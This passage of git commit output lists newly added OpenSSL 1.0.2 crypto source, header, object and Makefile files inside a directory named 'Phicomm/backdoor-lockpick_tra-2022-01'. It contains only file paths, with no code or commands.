 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_nist.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_prime.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_prime.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_prime.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_prime.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_print.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_print.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_rand.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_rand.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_recp.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_recp.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_shift.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_shift.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_sqr.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_sqr.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_sqrt.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_sqrt.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_word.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_word.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_x931p.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_x931p.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bnspeed.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bntest.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/divtest.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/exp.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/expspeed.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/exptest.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/lib
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/rsaz_exp.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/rsaz_exp.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/todo
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/vms-helper.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/buffer/Makefile
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/buffer/Makefile.bak
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/buffer/Makefile.save
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/buffer/buf_err.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/buffer/buf_err.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/buffer/buf_str.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/buffer/buf_str.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/buffer/buffer.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/buffer/buffer.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/buffer/buffer.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/buffer/lib
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/buildinf.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/Makefile
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/Makefile.bak
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/Makefile.save
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/asm/cmll-x86.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/asm/cmll-x86_64.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/asm/cmllt4-sparcv9.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/camellia.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/camellia.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/camellia.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/cmll_cbc.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/cmll_cbc.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/cmll_cfb.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/cmll_cfb.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/cmll_ctr.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/cmll_ctr.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/cmll_ecb.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/cmll_ecb.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/cmll_locl.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/cmll_misc.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/cmll_misc.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/cmll_ofb.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/cmll_ofb.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/cmll_utl.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/cmll_utl.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/lib
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/Makefile
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/Makefile.bak
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/Makefile.save
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/asm/cast-586.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/asm/readme
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/c_cfb64.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/c_cfb64.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/c_ecb.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/c_ecb.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/c_enc.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/c_enc.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/c_ofb64.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/c_ofb64.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/c_skey.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/c_skey.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/cast.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/cast_lcl.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/cast_s.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/cast_spd.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/castopts.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/casts.cpp
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/casttest.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/lib
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cmac/Makefile
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cmac/Makefile.bak
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cmac/Makefile.save
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cmac/cm_ameth.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cmac/cm_ameth.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cmac/cm_pmeth.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cmac/cm_pmeth.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cmac/cmac.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cmac/cmac.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cmac/cmac.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cmac/lib
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/Makefile
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/Makefile.bak
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/Makefile.save
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_asn1.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_asn1.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_att.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_att.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_cd.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_cd.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_dd.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_dd.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_enc.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_enc.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_env.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_env.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_err.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_err.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_ess.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_ess.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_io.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_io.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_kari.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_kari.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_lcl.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_lib.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_lib.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_pwri.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_pwri.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_sd.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_sd.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_smime.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_smime.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/lib
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/comp/Makefile
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/comp/Makefile.save
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/comp/c_rle.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/comp/c_zlib.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/comp/comp.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/comp/comp_err.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/comp/comp_lib.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/Makefile
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/Makefile.bak
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/Makefile.save
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/README
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/cnf_save.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/conf.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/conf_api.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/conf_api.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/conf_api.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/conf_def.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/conf_def.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/conf_def.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/conf_err.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/conf_err.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/conf_lib.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/conf_lib.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/conf_mall.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/conf_mall.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/conf_mod.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/conf_mod.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/conf_sap.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/conf_sap.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/keysets.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/lib
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/ssleay.cnf
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/test.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/constant_time_locl.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/constant_time_test.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cpt_err.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cpt_err.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cryptlib.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cryptlib.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cryptlib.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/crypto-lib.com
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/crypto.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cversion.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cversion.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/COPYRIGHT
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/DES.pm
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/DES.xs
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/FILES0
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/INSTALL
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/Imakefile
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/KERBEROS
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/Makefile
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/Makefile.bak
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/Makefile.save
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/README
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/VERSION
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/asm/crypt586.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/asm/des-586.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/asm/des_enc.m4
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/asm/desboth.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/asm/dest4-sparcv9.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/asm/readme
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/cbc3_enc.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/cbc_cksm.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/cbc_cksm.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/cbc_enc.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/cbc_enc.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/cfb64ede.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/cfb64ede.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/cfb64enc.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/cfb64enc.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/cfb_enc.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/cfb_enc.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/des-lib.com
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/des.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/des.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/des.pod
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/des3s.cpp
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/des_enc.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/des_enc.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/des_locl.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/des_old.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/des_old.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/des_old.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/des_old2.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/des_old2.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/des_opts.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/des_ver.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/dess.cpp
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/destest.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/ecb3_enc.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/ecb3_enc.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/ecb_enc.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/ecb_enc.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/ede_cbcm_enc.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/ede_cbcm_enc.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/enc_read.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/enc_read.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/enc_writ.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/enc_writ.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/fcrypt.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/fcrypt.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/fcrypt_b.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/fcrypt_b.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/lib
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/makefile.bc
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/ncbc_enc.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/ofb64ede.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/ofb64ede.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/ofb64enc.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/ofb64enc.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/ofb_enc.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/ofb_enc.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/options.txt
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/pcbc_enc.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/pcbc_enc.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/qud_cksm.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/qud_cksm.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/rand_key.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/rand_key.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/read2pwd.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/read2pwd.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/read_pwd.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/rpc_des.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/rpc_enc.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/rpc_enc.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/rpw.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/set_key.c
